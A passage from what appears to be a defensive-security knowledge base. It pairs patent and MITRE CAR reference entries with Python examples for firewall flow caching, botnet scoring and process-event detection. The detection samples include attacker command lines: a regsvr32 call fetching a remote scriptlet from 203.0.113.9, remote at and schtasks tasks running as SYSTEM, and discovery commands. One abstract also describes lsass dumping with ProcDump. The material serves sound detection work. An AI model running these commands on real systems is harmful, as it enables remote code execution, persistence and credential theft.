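               and ipaddress.ip_address(p["src"]) in INTERNAL, True),
]

# Constructed packets.
DNS_QUERY = {"src": "10.0.0.7", "dst": "10.0.0.53", "proto": "udp", "sport": 51000, "dport": 53}
ROGUE_DNS = {"src": "10.0.0.7", "dst": "203.0.113.7", "proto": "udp", "sport": 51001, "dport": 53}
```

Only the first packet of each flow costs a database lookup; later packets with the same tag are decided from the lists, which is the point of the two caches. Because the tag covers the source port, a new source port is a new flow and goes back to the database.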

Usage (5)

kb-abstract

  • "The present invention is a device for and method of accessing an information network by initializing a database, an ATM approved list, an IP approved list, and an IP disapproved list; receiving a datagram; discarding the datagram if it is not on the ATM approved list; determining the datagram's type; allowing access to the network and comparing the connection request, if any, to the database if the datagram is ATM signaling; discarding the datagram if the datagram is ATM signaling and the database denies the request; adding the request to the ATM approved list if the datagram is ATM signaling and the database allows the request; allowing access to the network if the datagram is ATM data that excludes IP data and the request is on the ATM approved list; computing a flow tag if the datagram is ATM data that includes IP data; discarding the datagram if the flow tag is on the IP disapproved list; allowing access to the network if the flow tag is on the IP approved list; comparing the flow tag to the database if the flow tag is neither on the IP approved list nor on the IP disapproved list; discarding the datagram and adding the flow tag to the IP disapproved list if the database rejects the flow tag; and allowing access to the network and adding the flow tag to the corresponding approved list if the database accepts the flow tag; and performing these steps on the next datagram"

kb-author

  • "Patrick W. Dowd, John T. McHenry"

kb-mitre-analysis

  • ""

kb-organization

  • "National Security Agency"

rdfs:label

  • "Reference - Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network - National Security Agency"

kb-reference-of

kb-reference-title

  • "Firewall for processing connection-oriented and connectionless datagrams over a connection-oriented network"

Usage (5)

kb-abstract

  • "Data transfer is controlled between a first network and a second network of computers by a firewall-proxy combination. Active interpretation of protocol commands exchanged between the first network and the second network is performed to determine specific actions concerning completion of the protocol request. This active firewall-proxy combination may exist on either the first or second network of computers. This method of control provides centralized control and administration for all potentially reachable resources within a network."

kb-author

  • "James E. Toga"

kb-mitre-analysis

  • ""

kb-organization

  • "Intel Corp"

rdfs:label

  • "Reference - Firewalls that filter based upon protocol commands - Intel Corp"

kb-reference-of

kb-reference-title

  • "Firewalls that filter based upon protocol commands"

Usage (5)

kb-abstract

  • "Methods, systems and machine-readable media for authenticating an end user for a client application are disclosed. According to one embodiment of the invention, a method of authenticating an end user for a client application using a directory service having an authentication control policy that tracks failed authentication attempts and allows lock out of an account after a predetermined number of failures comprises receiving end user identity information and security information at the client application; sending a search request to the directory service for an entry associated with the end user identity information and, if a match is found, receiving a authentication token from the directory service associated with the end user identity information; comparing the received authentication token with the security information; if the authentication token matches the security information, sending a request to update the directory service to indicate that successful authentication of the end user has occurred; and if the authentication token does not match the security information, sending a request to update the directory service to indicate that a failed attempt at authentication of the end user has occurred."

kb-author

  • "Buddhika Nandana Kottahachchi"

kb-mitre-analysis

  • ""

kb-organization

  • "Oracle International Corp"

rdfs:label

  • "Reference - Framework for notifying a directory service of authentication events processed outside the directory service - Oracle International Corp"

kb-reference-of

kb-reference-title

  • "Framework for notifying a directory service of authentication events processed outside the directory service"

Usage (5)

kb-abstract

  • ""

kb-author

  • ""

kb-mitre-analysis

  • ""

kb-organization

  • "Microsoft Docs"

rdfs:label

  • "Reference - /GS (Buffer Security Check) - Microsoft Docs"

kb-reference-of

kb-reference-title

  • "/GS (Buffer Security Check)"

Usage (5)

kb-abstract

  • "Regsvr32 can be used to execute arbitrary code in the context of a Windows signed binary, which can be used to bypass application whitelisting. This analytic looks for suspicious usage of the tool. It's not likely that you'll get millions of hits, but it does occur during normal activity so some form of baselining would be necessary for this to be an alerting analytic. Alternatively, it can be used for hunt by looking for new or anomalous DLLs manually."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-002: Generic Regsvr32 - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-002: Generic Regsvr32"

Usage (5)

kb-abstract

  • "A method of protecting a software program from unauthorized modification, and a system for practicing the method. The method utilizes self-protecting software code. Armed internally with self-defensive mechanisms, a self-protecting software program is tamper-resistant. Whenever its integrity is compromised, a self-protecting software program may become unusable due to software program crashes or other errors, or may generate subtle errors that do not immediately render the program unusable but still result in incorrect software program execution. A self-protecting software program also may be able to repair itself to restore the integrity of its damaged code. The system comprises a computer program for automatically adding self-protection features to a software program."

kb-author

  • "Hoi Chang; Mikhail J. Atallah; John R. Rice"

kb-mitre-analysis

  • ""

kb-organization

  • "Purdue Research Foundation"

rdfs:label

  • "Reference - Guards for application in software tamperproofing - Purdue Research Foundation"

kb-reference-of

kb-reference-title

  • "Guards for application in software tamperproofing"

Usage (5)

kb-abstract

  • "The present disclosure relates to a system and method for monitoring system calls to an operating system kernel. A performance monitoring unit is used to monitor system calls and to gather information about each system call. The information is gathered upon interrupting the system call and can include system call type, parameters, and information about the calling thread/process, in order to determine whether the system call was generated by malicious software code. Potentially malicious software code is nullified by a malicious code counter-attack module."

kb-author

  • "Matthew D. Spisak"

kb-mitre-analysis

  • "This patent describes a technique for monitoring system calls to detect malicious software code. A system call monitoring module operates at the kernel level and traps system calls.
    Monitoring data includes:

    * information about the path to the file to be accessed by a system call.
    * the memory address or range of addresses to be accessed by a system call.
    * the context for the thread within the operating system that will be interrupted by a system call.
    * the type of system call.
    * information about the socket that is being used by the system call in order to send or receive data.
    * the history of system calls in order to monitor for specific sequences of system calls.
    * the frequency or periodicity of a particular system call or set of system calls.

    Captured system call data is analyzed using data analysis algorithms such as machine learning algorithms, artificial intelligence algorithms, pattern recognition algorithms, or other known data analysis techniques. An alert is generated if it is likely that the system call was generated by malicious software code."

kb-organization

  • "Endgame Inc"

rdfs:label

  • "Reference - Hardware-assisted system and method for detecting and analyzing system calls made to an operating system kernel - Endgame Inc"

kb-reference-of

kb-reference-title

  • "Hardware-assisted system and method for detecting and analyzing system calls made to an operating system kernel"

Usage (5)

kb-abstract

  • "In some embodiments, heuristic botnet detection is provided. In some embodiments, heuristic botnet detection includes monitoring network traffic to identify suspicious network traffic; and detecting a bot based on a heuristic analysis of the suspicious network traffic behavior using a processor, in which the suspicious network traffic behavior includes command and control traffic associated with a bot master. In some embodiments, heuristic botnet detection further includes assigning a score to the monitored network traffic, in which the score corresponds to a botnet risk characterization of the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); increasing the score based on a correlation of additional suspicious behaviors associated with the monitored network traffic (e.g., based on one or more heuristic botnet detection techniques); and determining the suspicious behavior is associated with a botnet based on the score."

kb-author

  • "Xinran Wang; Huagang Xie"

kb-mitre-analysis

  • "This patent describes detecting botnets using heuristic analysis techniques on collected network flows. The heuristic techniques include:

    * Identifying suspicious traffic patterns to detect command and control traffic, e.g., periodically visiting a known malware URL, or a host visiting a malware domain twice every 5 hours and 14 minutes (this is a specific pattern for a variant of Swizzor botnets).
    * Identifying non-standard behaviors such as connecting to a non-standard HTTP port for HTTP traffic, visiting a non-existent domain, downloading executable files with non-standard executable file extensions, or communicating using an HTTP header with a shorter-than-common length.
    * Analyzing visited domain information to identify the following: visiting a domain with a domain name that is longer than a common domain name length, visiting a dynamic DNS domain, visiting a fast-flux domain, and visiting a recently created domain.

    A score is determined based on these factors and if the score is over a threshold, a responsive action is performed."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Heuristic botnet detection - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Heuristic botnet detection"
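
Scoring constructed flow records with the heuristics listed above, with the domain-registration-age check from the Rapid7 "Domain age registration alert" entry earlier on this page folded in as one of them, as an added Python example. The weights, threshold, dynamic-DNS suffixes, thirty-day age limit and sample flows are all constructed; neither Palo Alto Networks' nor Rapid7's code is reproduced.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed heuristic weights and lists (the patent names the heuristics, not the scores).
WEIGHTS = {
    "periodic": 30, "nonstd-port": 10, "exe-disguised": 20, "short-header": 10,
    "long-name": 10, "dyndns": 15, "new-domain": 20, "nxdomain": 10,
}
DYNAMIC_DNS_SUFFIXES = ("no-ip.org", "dyndns.org")
NEW_DOMAIN_DAYS = 30
THRESHOLD = 50


def is_newly_registered(registered, seen, days=NEW_DOMAIN_DAYS) -> bool:
    """Domain-age check (the Rapid7 entry): registration date within `days` of the access."""
    return registered is not None and seen - registered < timedelta(days=days)


def periodicity(timestamps, tolerance=0.1) -> bool:
    """True when at least three visits are spaced at near-constant intervals (beaconing)."""
    if len(timestamps) < 3:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return mean > 0 and statistics.pstdev(gaps) / mean <= tolerance


def score_host(flows):
    """Apply each heuristic once per (heuristic, domain) and sum the weights."""
    hits = set()
    visits = defaultdict(list)
    for f in flows:
        d = f["domain"]
        visits[d].append(f["ts"])
        if f["proto"] == "http" and f["port"] not in (80, 8080):
            hits.add(("nonstd-port", d))
        if not f["resolved"]:
            hits.add(("nxdomain", d))
        if f["content_type"] == "application/x-dosexec" and not f["uri"].lower().endswith(".exe"):
            hits.add(("exe-disguised", d))
        if f["header_len"] < 100:
            hits.add(("short-header", d))
        if len(d) > 30:
            hits.add(("long-name", d))
        if d.endswith(DYNAMIC_DNS_SUFFIXES):
            hits.add(("dyndns", d))
        if is_newly_registered(f["registered"], f["ts"]):
            hits.add(("new-domain", d))
    for d, stamps in visits.items():
        if periodicity(stamps):
            hits.add(("periodic", d))
    score = sum(WEIGHTS[code] for code, _ in hits)
    return score, ("block" if score >= THRESHOLD else "allow"), sorted(hits)


def evaluate(flows):
    """Group flows by source host and score each host."""
    per_host = defaultdict(list)
    for f in flows:
        per_host[f["host"]].append(f)
    return {host: score_host(fs) for host, fs in per_host.items()}


# Constructed flow records: one beaconing host and one ordinary one.
T0 = datetime(2024, 1, 1, 9, 0)
SAMPLE_FLOWS = [
    {"host": "10.0.0.5", "domain": "update-check.no-ip.org", "ts": T0 + timedelta(hours=i),
     "proto": "http", "port": 8443, "resolved": True, "uri": "/img/logo.jpg",
     "content_type": "application/x-dosexec", "header_len": 60,
     "registered": T0 - timedelta(days=10)}
    for i in range(4)
] + [
    {"host": "10.0.0.9", "domain": "www.example.com", "ts": T0 + timedelta(minutes=m),
     "proto": "https", "port": 443, "resolved": True, "uri": "/",
     "content_type": "text/html", "header_len": 420,
     "registered": datetime(1995, 8, 14)}
    for m in (3, 17)
]
```

Each heuristic counts once per domain, so a host that beacons forty times is not scored forty times for the same port; what raises the score is the correlation of different behaviours on the same traffic, which is how the abstract describes the increase.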

Usage (5)

kb-abstract

  • "When entering on a host for the first time, an adversary may try to discover information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. The information returned may impact choices an adversary can make when establishing persistence, escalating privileges, or moving laterally.

    Because these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-03-001: Host Discovery Commands - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-03-001: Host Discovery Commands"
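
A detection pass over constructed Sysmon-style process-creation records for the four CAR analytics on this page (CAR-2013-05-004, CAR-2013-08-001, CAR-2019-04-002 and CAR-2016-03-001), as an added Python example rather than MITRE's own analytic code. The discovery command list, window, distinct-command threshold, baselined account and regsvr32 module baseline are constructed tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed tuning: which images count as discovery, how many distinct ones within the
# window raise an alert, and which accounts are baselined out of the discovery analytic.
DISCOVERY_IMAGES = {"hostname.exe", "ipconfig.exe", "net.exe", "systeminfo.exe",
                    "whoami.exe", "netstat.exe", "tasklist.exe", "quser.exe", "sc.exe"}
DISCOVERY_WINDOW = timedelta(minutes=30)
DISCOVERY_MIN_DISTINCT = 4
BASELINED_USERS = {"corp\\svc-inventory"}
# Constructed regsvr32 baseline: module arguments seen during normal activity.
KNOWN_REGSVR32_MODULES = {r"c:\windows\system32\wuapi.dll"}


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_process(event):
    """Per-event analytics for at.exe, schtasks.exe and regsvr32.exe; returns findings."""
    img, cmd = basename(event["image"]), event["cmdline"].lower()
    findings = []
    if img == "at.exe":
        target = "remote host" if "\\\\" in cmd else "local host"
        findings.append(f"CAR-2013-05-004: at.exe scheduling on {target}")
    elif img == "schtasks.exe" and "/create" in cmd:
        tags = []
        if re.search(r"\s/s\s", cmd):
            tags.append("remote system named with /s")
        if re.search(r'/ru\s+"?(nt authority\\)?system\b', cmd):
            tags.append("task runs as SYSTEM")
        suffix = " (" + ", ".join(tags) + ")" if tags else ""
        findings.append("CAR-2013-08-001: schtasks /create" + suffix)
    elif img == "regsvr32.exe":
        tokens = cmd.split()[1:]
        if any(t.startswith("/i:http") for t in tokens):
            findings.append("CAR-2019-04-002: regsvr32 /i: with remote scriptlet")
        for module in (t for t in tokens if not t.startswith("/")):
            if module not in KNOWN_REGSVR32_MODULES:
                findings.append(f"CAR-2019-04-002: regsvr32 loading unbaselined module {module}")
    return findings


def discovery_alerts(events):
    """CAR-2016-03-001: hosts where one non-baselined account ran several distinct
    discovery commands inside the window."""
    seen = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if basename(e["image"]) in DISCOVERY_IMAGES and e["user"].lower() not in BASELINED_USERS:
            seen[(e["host"], e["user"].lower())].append((e["ts"], basename(e["image"])))
    alerted = set()
    for (host, _), items in seen.items():
        for ts, _ in items:
            distinct = {img for t, img in items if ts - DISCOVERY_WINDOW <= t <= ts}
            if len(distinct) >= DISCOVERY_MIN_DISTINCT:
                alerted.add(host)
                break
    return sorted(alerted)


def run_analytics(events):
    process = [(e["host"], basename(e["image"]), analyze_process(e)) for e in events]
    return {"process": [p for p in process if p[2]], "discovery": discovery_alerts(events)}


T0 = datetime(2024, 3, 4, 13, 0)


def ev(host, user, minute, image, cmdline):
    return {"host": host, "user": user, "ts": T0 + timedelta(minutes=minute),
            "image": image, "cmdline": cmdline}


# Constructed process-creation records (Sysmon-style fields, reduced to what is used).
SAMPLE_EVENTS = [
    ev("WS01", "CORP\\jdoe", 0, r"C:\Windows\System32\whoami.exe", "whoami /all"),
    ev("WS01", "CORP\\jdoe", 1, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ev("WS01", "CORP\\jdoe", 2, r"C:\Windows\System32\net.exe", "net user"),
    ev("WS01", "CORP\\jdoe", 3, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    ev("WS01", "CORP\\jdoe", 4, r"C:\Windows\System32\tasklist.exe", "tasklist /v"),
    ev("WS02", "CORP\\svc-inventory", 0, r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    ev("WS02", "CORP\\svc-inventory", 1, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    ev("WS02", "CORP\\svc-inventory", 2, r"C:\Windows\System32\net.exe", "net localgroup administrators"),
    ev("WS02", "CORP\\svc-inventory", 3, r"C:\Windows\System32\whoami.exe", "whoami"),
    ev("WS01", "CORP\\jdoe", 10, r"C:\Windows\System32\at.exe", r"at \\WS03 14:00 cmd.exe /c c:\temp\s.bat"),
    ev("WS01", "CORP\\jdoe", 11, r"C:\Windows\System32\schtasks.exe",
       r"schtasks /create /s WS04 /ru SYSTEM /tn updater /tr c:\temp\u.exe /sc onlogon"),
    ev("WS01", "CORP\\jdoe", 12, r"C:\Windows\System32\regsvr32.exe",
       "regsvr32 /s /n /u /i:http://203.0.113.9/a.sct scrobj.dll"),
    ev("WS05", "CORP\\admin", 0, r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s c:\windows\system32\wuapi.dll"),
]
```

The discovery analytic is the one that needs the whitelist and the window the CAR text asks for: the inventory account on WS02 runs the same commands as the user on WS01 but is baselined out, and the WS05 regsvr32 event is silent only because its module is in the baseline.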

Usage (5)

kb-abstract

  • "In embodiments of the present invention improved capabilities are described for threat detection using a behavioral-based host-intrusion prevention method and system for monitoring a user interaction with a computer, software application, operating system, graphic user interface, or some other component or client of a computer network, and performing an action to protect the computer network based at least in part on the user interaction and a computer code process executing during or in association with a computer usage session."

kb-author

  • "Clifford C. Wright"

kb-mitre-analysis

  • "The patent describes a technique for performing behavior based threat detection. User and code behavior data is collected and stored to create baseline user and code behavior profiles. User behavior data collected over a user session or over multiple sessions can include a user:

    * clicking on a link
    * scrolling down a page
    * opening or closing a window
    * downloading a file
    * saving a file
    * running a file
    * typing a keyword

    Code behavior monitored includes code:

    * copying itself to a system folder
    * setting a run key to itself in the registry
    * setting a second run key to itself in the registry in a different location
    * disabling OS tools in the registry
    * opening a hidden file

    The user interaction and the code process executed during the user session are monitored and compared with predetermined malicious behavior profiles that are typically present in a malicious user session. The predetermined collection of malicious behaviors is created based on analysis of families of malware at run time in a threat research facility. If a match is made an action is taken that can include isolating the computer on which the user interaction occurs and limiting network access to or from the computer."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Host intrusion prevention system using software and user behavior analysis - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Host intrusion prevention system using software and user behavior analysis"

Usage (5)

kb-abstract

  • "ASLR (Address Space Layout Randomization) is a memory exploitation mitigation technique used on both Linux and Windows systems. Learn how to tell if it's running, enable/disable it, and get a view of how it works."

kb-author

  • "Sandra Henry-Stocker"

kb-mitre-analysis

  • ""

kb-organization

  • "Network World"

rdfs:label

  • "Reference - How ASLR protects Linux systems from buffer overflow attacks - Network World"

kb-reference-of

kb-reference-title

  • "How ASLR protects Linux systems from buffer overflow attacks"

Usage (5)

kb-organization

  • "IEEE"

rdfs:label

  • "Reference - IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery"

kb-reference-of

kb-reference-title

  • "IEEE Standard for Local and Metropolitan Area Networks - Station and Media Access Control Connectivity Discovery"

Usage (5)

kb-abstract

  • "Various embodiments pertain to communication network systems. In particular, various embodiments relate to multi-path probing in communication network systems that can be used to estimate the complete topology of the network. A method includes receiving data at a source node from a tracerouting probe in a network. The data includes information about at least one network node. The method also includes determining an identification for the at least one network node based on information. In addition, the method includes using the identification of the at least one network node to determine an identification of at least one device."

kb-author

  • "Tomas KUBIK, Lan Li, Tomas RYBKA, Karlo ZATYLNY, Chris O'Brien"

kb-organization

  • "SolarWinds Worldwide LLC"

rdfs:label

  • "Reference - Identification of traceroute nodes and associated devices"

kb-reference-title

  • "Identification of traceroute nodes and associated devices"

Usage (5)

kb-abstract

  • "Return-oriented programming (ROP) has become the primary exploitation technique for system compromise in the presence of non-executable page protections. ROP exploits are facilitated mainly by the lack of complete address space randomization coverage or the presence of memory disclosure vulnerabilities, necessitating additional ROP-specific mitigations. In this paper we present a practical runtime ROP exploit prevention technique for the protection of third-party applications. Our approach is based on the detection of abnormal control transfers that take place during ROP code execution. This is achieved using hardware features of commodity processors, which incur negligible runtime overhead and allow for completely transparent operation without requiring any modifications to the protected applications. Our implementation for Windows 7, named kBouncer, can be selectively enabled for installed programs in the same fashion as user-friendly mitigation toolkits like Microsoft's EMET. The results of our evaluation demonstrate that kBouncer has low runtime overhead of up to 4%, when stressed with specially crafted workloads that continuously trigger its core detection component, while it has negligible overhead for actual user applications. In our experiments with in-the-wild ROP exploits, kBouncer successfully protected all tested applications, including Internet Explorer, Adobe Flash Player, and Adobe Reader."

kb-author

  • "Vasilis Pappas, Michalis Polychronakis, Angelos D. Keromytis"

kb-organization

  • "Columbia University"

rdfs:label

  • "Reference - Indirect Branching Calls"

kb-reference-of

kb-reference-title

  • "Transparent ROP Exploit Mitigation using Indirect Branch Tracing"

Usage (5)

kb-abstract

  • "A security agent implemented on a monitored computing device is described herein. The security agent is configured to detect an action of interest (AoI) that may be probative of a security exploit and to determine a context in which that AoI occurred. Based on that context, the security agent is further configured to decide whether the AoI is a security exploit and can take preventative action to prevent the exploit from being completed.

    Determining that the AoI includes the security exploit is based at least in part on one or more of: determining that the return address is outside memory previously allocated for an object; determining that the object identifier is associated with a vulnerable object; determining that permissions of the memory region include two or more of read, write, and execute; or determining that the memory region is one page in length.

    Determining that the return address is outside memory previously allocated for an object and the method further including treating code that the return address points to as malicious code."

kb-author

  • "Daniel W. Brown; Ion-Alexandru Ionescu; Loren C. Robinson"

kb-mitre-analysis

  • ""

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Inferential exploit attempt detection - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Inferential exploit attempt detection"

Usage (5)

kb-abstract

  • "A method and system for automatic termination of unauthorized malevolent processes operating on an information handling system. A list of authenticated and essential process list is stored on the information handling system. Unauthorized processes not contained on the list can be automatically terminated by the user by invoking the present invention with a single click of a mouse or pointer device on an icon residing on the display screen of the information handling system. The offending processes are immediately terminated without generating a user prompt, which would ordinarily provide sufficient time for the malware to spawn additional offending processes. The present invention also provides significant means to recover control of a malware-infected information handling system in order to use repair tools and utilities. The present invention can be deployed at the time of manufacture of an information handling system or independently installed by a user."

kb-author

  • "Carlton Andrews"

kb-mitre-analysis

  • ""

kb-organization

  • "Dell Products LP"

rdfs:label

  • "Reference - Instant process termination tool to recover control of an information handling system - Dell Products LP"

kb-reference-of

kb-reference-title

  • "Instant process termination tool to recover control of an information handling system"

Usage (5)

kb-abstract

  • "Techniques utilizing library and pre-boot components to ensure that a driver associated with a kernel-mode component is initialized before other drivers during a boot phase are described herein. The library component is processed during a boot phase; the pre-boot component, which may be an alternative to the library component, is processed during a pre-boot phase. By ensuring that the driver is the first driver initialized, the components enable the driver to launch the kernel-mode component before other drivers are initialized. The library component may also determine whether another driver is to be initialized before the kernel-mode component driver, may ensure that kernel-mode component driver is initialized first, and may alert the kernel-mode component. Also, the library component may retrieve information that is to be deleted by the operating system before initialization of drivers and may provide that information to the kernel-mode component."

kb-author

  • "Ion-Alexandru Ionescu"

kb-mitre-analysis

  • "To compromise software or to gain control of a host device, a security exploit can modify driver initialization order used by an operating system and place a driver associated with the security exploit first in a list of drivers initialized by the operating system.

    This patent describes ensuring that a driver associated with the agent is initialized first. To ensure the driver is initialized first, a dependent DLL associated with the driver is configured to be processed before other dependent DLLs. The dependent DLL can be configured to be processed first by various methods, for example if processing is done in alphabetical order, changing its name to be processed first. The dependent DLL, once processed, executes a number of operations to ensure the driver associated with the agent is initialized first. Furthermore, if the initialization order is modified, an alert is provided to the kernel-mode component that notifies the kernel-mode component it was not first and the order had to be altered. It can then take additional actions such as additional monitoring or remediation."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Integrity assurance through early loading in the boot phase - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Integrity assurance through early loading in the boot phase"

Usage (5)

kb-abstract

  • "A variety of techniques are disclosed for detection of advanced persistent threats and similar malware. In one aspect, the detection of certain network traffic at a gateway is used to trigger a query of an originating endpoint, which can use internal logs to identify a local process that is sourcing the network traffic. In another aspect, an endpoint is configured to periodically generate and transmit a secure heartbeat, so that an interruption of the heartbeat can be used to signal the possible presence of malware. In another aspect, other information such as local and global reputation information is used to provide context for more accurate malware detection."

kb-author

  • "Kenneth D. Ray"

kb-mitre-analysis

  • "This patent describes a health monitor deployed on an endpoint that uses a heartbeat to periodically communicate status to a gateway's remote health monitor. The endpoint health monitor issues a heartbeat for satisfactory status of the endpoint using factors such as:

    * checking the status of individual software items executing on the endpoint
    * checking that antivirus and other security software is up to date (e. g., with current virus definition files) and running correctly
    * checking the integrity of cryptographic key stores
    * checking other hardware or software components of the endpoint as necessary or helpful for health monitoring

    A disappearance of the heartbeat from the endpoint may indicate that the endpoint has been compromised."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Intrusion detection using a heartbeat - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Intrusion detection using a heartbeat"

Usage (5)

kb-abstract

  • "LUKS is short for "Linux Unified Key Setup". It has initially been developed to remedy the unpleasantness a user experienced that arise from deriving the encryption setup from changing user space, and forgotten command line arguments. The result of this changes are an unaccessible encryption storage. The reason for this to happen was, a unstandardised way to read, process and set up encryption keys, and if the user was unlucky, he upgraded to an incompatible version of user space tools that needed a good deal of knowledge to use with old encryption volumes."

kb-author

  • "Clemens Fruhwirth"

rdfs:label

  • "Reference - LUKS1 On-Disk Format SpecificationVersion 1.2.3"

kb-reference-of

kb-reference-title

  • "LUKS1 On-Disk Format SpecificationVersion 1.2.3"

Usage (5)

kb-abstract

  • "LibreNMS has the ability to show you a network map based on:
    * xDP Discovery
    * MAC addresses"

kb-organization

  • "LibreNMS.org"

rdfs:label

  • "Reference - Libre NMS - Network Map Extension"

kb-reference-of

kb-reference-title

  • "Libre NMS - Network Map Extension"

Usage (5)

kb-abstract

  • "Integrating LibreNMS with Oxidized brings the following benefits:

    * Config viewing: Current, History, and Diffs all under the Configs tab of each device
    * Automatic addition of devices to Oxidized: Including filtering and grouping to ease credential management
    * Configuration searching"

kb-organization

  • "LibreNMS.org"

rdfs:label

  • "Reference - Libre NMS - Oxidized Extension"

kb-reference-of

kb-reference-title

  • "LibreNMSDocs - Oxidized Extension"

Usage (5)

kb-abstract

  • "ProcDump is a sysinternal command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike.

    ProcDump may be used to dump the memory space of lsass.exe to disk for processing with a credential access tool such as Mimikatz. This is performed by launching procdump.exe as a privileged user with command line options indicating that lsass.exe should be dumped to a file with an arbitrary name."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-07-002: Lsass Process Dump via Procdump - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-07-002: Lsass Process Dump via Procdump"

Usage (5)

kb-abstract

  • "Vulnerability, patch, and configuration management are not new security topics. In fact, they are some of the oldest security functions. Yet, we still struggle to manage these capabilities effectively. The quantity of outstanding vulnerabilities for most large organizations is overwhelming, and all organizations struggle to keep up with the never-ending onslaught of new vulnerabilities in their infrastructure and applications. When you add in the cloud and the increasing speed with which all organizations must deliver systems, applications, and features to both their internal and external customers, security may seem unachievable. This course will show you the most effective ways to mature your vulnerability management program and move from identifying vulnerabilities to successfully treating them. 16 Cyber42 and lab exercises"

kb-author

  • "Jonathan Risto and David Hazar"

kb-organization

  • "SANS"

rdfs:label

  • "Reference - MGT516: Managing Security Vulnerabilities: Enterprise and Cloud"

kb-reference-of

kb-reference-title

  • "MGT516: Managing Security Vulnerabilities: Enterprise and Cloud"

Usage (5)

kb-abstract

  • "A system and method for detecting malicious relay communications is disclosed. Network communications can be received and analyzed using such network components as a network switch. The received traffic can be parsed into sessions. Relay metadata can be extracted from the sessions and further be used to categorize the sessions into one or more types of relay metadata behaviors. Once a significant amount of sessions are detected an alarm may be triggered and/or alarm data may be generated for analysis by network security administrators."

kb-author

  • "Ryan James PRENGER; Nicolas BEAUCHESNE; Karl Matthew LYNN"

kb-mitre-analysis

  • "This patent describes a technique for detecting relay networks, i.e. an attacker outside of the organization's network takes control of an internal host to be used as a source of attacks against other internal targets or exfiltrate data out of the organization. In this defensive technique, metadata from collected network packet captures is extracted to categorize network sessions using known relay behaviors. Information such as the number of bytes sent to and from a potential internal relay host, time of session initiation, packet contents, packet size, flow direction, and packet arrival time statistics are used to categorize the sessions and identify relay behavior. This technique assumes that relay network connections' inter-packet arrival times exhibit a high degree of variance in comparison to standard client-to-server connections. If enough evidence of relay behavior is gathered about a given internal host, the host is identified as suspicious and an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - Malicious relay detection on networks - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "Malicious relay detection on networks"

Usage (5)

kb-abstract

  • "In some embodiments, a malware analysis system includes receiving a potential malware sample from a firewall; analyzing the potential malware sample using a virtual machine to determine if the potential malware sample is malware; and automatically generating a signature if the potential malware sample is determined to be malware. In some embodiments, the potential malware sample does not match a preexisting signature, and the malware is a zero-day attack."

kb-author

  • "Huagang Xie; Xinran Wang; Jiangxia Liu"

kb-mitre-analysis

  • "This patent describes a VM sandbox environment that uses heuristic based analysis techniques performed in real-time during a file transfer to determine if the file is malicious. A new signature can then be generated and distributed to automatically block future file transfer requests to download the malicious file."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - Malware analysis system - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "Malware analysis system"

Usage (5)

kb-abstract

  • "Example techniques locate or identify malware based on events from or at monitored computing devices. A control unit can detect a sequence of events of various types. The control unit can locate a loop within the sequence of events based at least in part on relative frequencies of the event types. The control unit can determine a distribution of event types of the events within the loop, and determining that software running the sequence is associated with malware based at least in part on the distribution of event types within the loop. In some examples, the control unit can locate a point of commonality among a plurality of stack traces associated with respective events within the loop. The control unit can determine a malware module comprising the point of commonality."

kb-author

  • "Daniel W. Brown"

kb-mitre-analysis

  • "The patent describes determining if a sequence of events associated with a process are associated with malware. Based on the relative frequency of events, a loop within a sequence of events is located and a distribution of the events within the loop is determined. The distribution of events is then compared against a catalog of distributions to determine if it is associated with malware."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Malware detection in event loops - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Malware detection in event loops"

Usage (5)

kb-abstract

